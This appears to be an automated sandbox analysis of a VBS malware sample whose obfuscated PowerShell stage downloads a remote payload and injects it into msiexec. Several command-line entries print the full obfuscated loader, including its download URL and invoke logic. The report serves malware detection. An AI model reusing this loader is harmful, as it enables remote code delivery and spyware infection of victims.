Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(Burn
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_00007FFD9B9FB2EE
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_00007FFD9B9FC09E
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_00007FFD9B9F0D92
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 3_2_04C8F320
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 3_2_04C8FBF0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 3_2_04C8EFD8
                Source: Bnnebgers.vbs, Initial sample: Strings found which are bigger than 50
                Source: C:\Windows\System32\wscript.exe, Process created: Commandline size = 6826
                Source: unknown, Process created: Commandline size = 6826
                Source: amsi32_4348.amsi.csv, type: OTHER, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6648, type: MEMORYSTR, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 4348, type: MEMORYSTR, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engine, Classification label: mal100.troj.spyw.expl.evad.winVBS@8/10@2/3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\Assimileringens.Lan
                Source: C:\Windows\SysWOW64\msiexec.exe, Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
                Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6944:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ey4v2zi.ok2.ps1
                Source: unknown, Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6648
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4348
                Source: C:\Windows\System32\wscript.exe, File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\System32\wscript.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknown, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\System32\wscript.exe, Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, sxs.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, msasn1.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, apphelp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe, Section loaded: apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, iphlpapi.dll, mswsock.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, vaultcli.dll, wintypes.dll, netapi32.dll, samcli.dll, samlib.dll, userenv.dll, ntmarta.dll
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbIn.1 source: powershell.exe, 00000003.00000002.2706218457.00000000077DE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000003.00000002.2706218457.00000000077DE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2706218457.00000000077CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdb source: powershell.exe, 00000003.00000002.2706218457.00000000077CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: indows\System.Core.pdb] source: powershell.exe, 00000003.00000002.2706218457.00000000077CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.2681410204.000000000320A000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: POWERSHELL "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv ", "0")
                Source: Yara match File source: 00000003.00000002.2714081528.000000000BE9C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.2713834484.0000000008BE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.2700448526.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.1879470181.000001CA5698E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Kimeridgian)$global:Pepperwort4 = [System.Text.Encoding]::ASCII.GetString($Produktudvikleres)$global:Scrutator=$Pepperwort4.substring($Bemandingers,$Baksningens)<#Uenigst Epipharynx
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Taagerne $Sagn $Velbehagelig), (Desorganiseringers @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Coprophilic = [AppDomain]::CurrentDomain.GetAssemblies()
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Financivgr)), $Forcere).DefineDynamicModule($Semperannual, $false).DefineType($Dropsonde, $Threateningness, [System.MulticastDelegate]
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Kimeridgian)$global:Pepperwort4 = [System.Text.Encoding]::ASCII.GetString($Produktudvikleres)$global:Scrutator=$Pepperwort4.substring($Bemandingers,$Baksningens)<#Uenigst Epipharynx
                Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Source: 31437F.exe.8.dr Static PE information: section name: .didat
                Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Roaming\188E93\31437F.exe
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5006
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4833
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5528
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4271
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7012 Thread sleep time: -5534023222112862s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7072 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 1440 Thread sleep count: 4562 > 30
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 5000 Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exe Thread sleep count: Count: 4562 delay: -5
                Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 60000
                Source: powershell.exe, 00000001.00000002.1887143994.000001CA5EE48000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlles
                Source: msiexec.exe, 00000008.00000002.3013665698.0000000008846000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_033CD338 LdrInitializeThunk,LdrInitializeThunk,3_2_033CD338

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match File source: amsi64_6648.amsi.csv, type: OTHER
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 6648, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 4348, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2C80000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2C7FEA8
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl 
Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(BurnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" (same command line as the preceding entry)
